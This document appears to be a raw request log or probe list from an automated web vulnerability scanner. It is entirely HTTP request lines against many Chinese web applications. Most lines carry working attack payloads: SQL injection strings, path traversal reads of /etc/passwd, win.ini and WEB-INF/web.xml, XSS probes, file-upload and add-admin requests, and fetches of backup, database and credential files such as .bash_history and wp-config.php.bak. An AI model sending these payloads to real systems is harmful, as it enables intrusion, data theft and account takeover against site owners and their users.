GET /include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
POST /public/oa_nodebanliren_frm.asp
POST /include/chaxundetail.asp
POST /include/user/bdtreemx.asp
POST /admin/Fileup.aspx?path=notice/upload
GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
GET /inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
GET /Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
GET /ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
GET /piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
GET /schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
POST /common/mod/ajax.ashx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
POST /dakai.aspx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
GET /Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
GET /main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
GET /index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
GET /website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
GET /varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
POST /getpassword.php?do=login
GET /api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
GET /servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
GET /servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
POST /index.php?m=register&c=ajax_reg
GET /api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
GET /witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
GET /nicknamelogin.jsp
GET /jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
GET /lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
POST /index.php?m=register&c=ajax_reg
GET /inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
GET /ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
GET /utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
POST /?q=node&destination=node
GET /UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
POST /jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
HEAD /govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
GET /down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
POST /api/CheckMemberLogin.ashx?type=mobileisexist
GET /comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
POST /LoginCheck.aspx
GET /NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
GET /index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
GET /Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
GET /show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
GET /NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
GET /NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
GET /NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
GET /NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
GET /zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
GET /AdminP
GET /lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
HEAD /public/download.asp?filename=../login2.asp/
GET /Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
GET /index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
POST /API/DownloadProducts.ashx
GET /Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
GET /ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
GET /SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
POST /MShop/Partial/SuppLogo
POST /ShoppingHandler.aspx
HEAD /bq/Data/BIData.zip
GET /jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
HEAD /vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
POST /cms/voteManager/voteaction.jsp
GET /EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
POST /ShopManage.aspx
GET /RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
POST /SNS/Product/WaterfallProductListData
POST /ProSales/GetListCate
HEAD /jphoto/jphoto/sys/member/opr_export.jsp
POST /JwGl/jxjh/JxjhXGBc.asp
GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
HEAD /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
GET /defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
GET /defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
GET /cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
GET /cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
POST /login.asp
POST /search.php
GET /LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
GET /jwgl/jxjh/jxjha.asp
POST /jwgl/jcxx/savetofile.asp
POST /public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
GET /Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
POST /govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
GET /edoas2/edoas2_test.jsp
GET /Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
POST /celive/live/header.php
GET /SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
HEAD /skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
GET /RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
GET /m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
GET /BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
GET /Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
GET /plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
GET /admin/admin_database.aspx
GET /flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
GET /video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
GET /blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
GET /?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
GET /search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
GET /model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
GET /cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
GET /cctrl/backup/index.php
GET /cctrl/admin/purview/purview.php
HEAD /data_Xbaby/gdjm133950.mdb
GET /admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
GET /admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
GET /admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
POST /admin/upfile.asp
POST /admin/upfile_yqhy.asp
GET /FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
GET /FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
GET /FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
POST /VIEWGOOD/ADI/portal/UserDataSync.aspx
POST /SPM/Pc/Content/Request.aspx?action=name_check
GET /VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
GET /adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
GET /adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
GET /ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
GET /admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
POST /include/upload.asp
GET /TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
GET /TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
GET /Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
GET /WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
GET /WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
GET /Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
GET /Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
GET /products.asp
GET /App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
GET /product_view.asp
HEAD /system/database/data.mdb
POST /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
POST /manage/CHKLOGIN.ASP
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
POST /search.asp
GET /onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
HEAD /db1/%23kepu.mdb
POST /upfile.asp
POST /upfile2.asp
POST /upfile3.asp
HEAD /data/xinfang.mdb
GET /VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
HEAD /gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
GET /Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
POST /WS/WebServiceBase.asmx/GetXMLList
POST /WS/WebService.asmx/GetFile
POST /WS/WebService.asmx/GetFileContent
GET /WS/WebService.asmx
POST /bos/desktop/ajax/EcAjax.aspx
GET /bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
GET /Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
GET /ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
POST /interface/ipsconnect/ipsconnect.php
GET /templates/
GET /service/local/outreach/welcome/nexusSpaces.css
GET /phpRedisAdmin/?overview
GET /?overview
GET /index.html#/dashboard/file/logstash.json
GET /
GET /index.php/weblinks-categories?id=just_test
POST /index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
GET /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
POST /FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
GET /index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
GET /share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
GET /oxoxoxoxoxoxox.com
GET /oxoxoxoxoxoxox.com/
POST /api/xmlrpc
HEAD /wwwroot.rar
HEAD /wwwroot.zip
HEAD /wwwroot.tar.gz
HEAD /web.rar
HEAD /www.rar
HEAD /www.zip
HEAD /www.tar.gz
HEAD /web.zip
GET /crossdomain.xml
PUT /webscan_test.txt
GET /phpinfo.php
GET /info.php
GET /test.php
GET /shop.php?ac=view&shopid=1-cfreer
GET /wp-includes/registration-functions.php
GET /wp-includes/registration.php
GET /
GET /
GET /NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
GET /pass.txt
GET /passwd
GET /password.txt
GET /passwords.txt
GET /users.txt
GET /users.ini
GET /admin.cfg
GET /install.log
GET /database.inc
GET /common.inc
GET /db.inc
GET /connect.inc
GET /conn.inc
GET /sql.inc
GET /.bash_history
GET /.bashrc
GET /Web.config
GET /Global.asax
GET /Global.asa
GET /Global.asax.cs
GET /data.mdb
GET /domcfg.nsf
GET /names.nsf
GET /log.nsf
GET /domlog.nsf
GET /.rediscli_history
GET /data/%23data.mdb
GET /config.inc.php.bak
GET /config/config_ucenter.php.bak
GET /config/config_global.php.bak
GET /uc_server/data/config.inc.php.bak
GET /data/common.inc.php.bak
GET /wp-config.php.bak
GET /WEB-INF/database.properties
GET /
GET /robots.txt
GET /
GET /index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
GET /
GET /nevercouldexistfilenosec
GET /nevercouldexistfilewebsec
GET /nevercouldexistfilenosec.aspx
GET /nevercouldexistfilewebsec.aspx
GET /nevercouldexistfilenosec.shtml
GET /nevercouldexistfilewebsec.shtml
GET /nevercouldexistfilenosec/
GET /nevercouldexistfilewebsec/
GET /nevercouldexistfilenosec.zip
GET /nevercouldexistfilewebsec.zip
GET /nevercouldexistfilenosec.php
GET /nevercouldexistfilewebsec.php
GET /nevercouldexistfilenosec.bak
GET /nevercouldexistfilewebsec.bak
GET /nevercouldexistfilenosec.rar
GET /nevercouldexistfilewebsec.rar
GET /
GET /wp-admin
GET /
GET /admin.php
GET /dede/
GET /administrator/
PUT /jsky_web_scanner_test_file.txt
GET /user
GET /nosec_Web_Scanner_Test.dll
TRACE /TRACE_test
GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
TRACK /TRACK_test
OPTIONS /
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
GET /_vti_bin/_vti_adm/admin.dll
GET /_vti_bin/_vti_aut/author.dll
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
GET /%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
GET /_vti_bin/shtml.exe?_vti_rpc
GET /server-info
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
